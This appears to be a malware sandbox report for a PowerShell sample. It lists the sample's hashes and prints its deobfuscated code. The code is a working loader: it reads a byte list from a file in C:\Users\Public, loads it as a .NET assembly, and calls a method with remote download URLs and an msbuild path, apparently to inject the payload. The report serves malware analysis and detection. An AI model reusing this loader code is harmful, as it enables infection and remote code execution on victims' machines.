Malicious
Malicious

e59a76c845fab8378306a568bd692b50

PowerShell
|
MD5: e59a76c845fab8378306a568bd692b50
|
Size: 1.68 KB
|
application/x-powershell

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
e59a76c845fab8378306a568bd692b50
Sha1
62fb005757f1e98d1e1dade1c909e9ccdc84adb7
Sha256
ac8de596f9b5451e44d91991354df27647de83f648991c78f3252d97bc4e4666
Sha384
62e893ba29faaae34e6cc4223e880666996c74666a4ac59f7921c885c043caf950cc51286bd1d4ef447ba010831064a9
Sha512
ee6ca94b670d6f3738e9c516656155be8cbc4b97d3aca8caead1edfbbff2aa399604c4ffef1fc95e9caa16a156d5be7be1b16ded1e03de0392b8a113546327cd
SSDeep
48:Olbx5Q+o+CQaAAhbAJR1RBSkL7mOgn45MPzu:KbfQ+5CQadhbAdH1mRnPK
TLSH
44319C5067F55608B6B35E04AABFA852883B76BE9D79CB4D0044C14E17B2A04DC7BF33
File Structure
e59a76c845fab8378306a568bd692b50
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeNo" $zgHoW = "%base64%dHh0LnJwL2I4OGY5YS9tb2MuYW緒ydW9ydHNhYy5vZ29sYXRhYy8vOnNwdHRo" $zgHoW = ($zgHoW -replace @("緒", "l")) $cTFzN = "C:\Users\Public\pfvzx.txt" $jrtrp = (Get-Content -Path $cTFzN -Encoding "UTF8") $jrtrp -replace @(" ", "") [byte[]] $cplhq = [List`1]::"new"() $cplhq = ($jrtrp -split "," | ForEach-Object [byte] ($_."Trim"())) $srQDo = [Assembly]::"Load"($cplhq) $gxVxI = $srQDo."GetType"("ClassLibrary3.Class1") $XDrQd = $gxVxI."GetMethod"("prFVI")."invoke"($gkUIH, [object[]] (@($zgHoW, "C:\Users\Public\nswls的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild", "$true", $RBBfZ)))
e59a76c845fab8378306a568bd692b50 (1.68 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙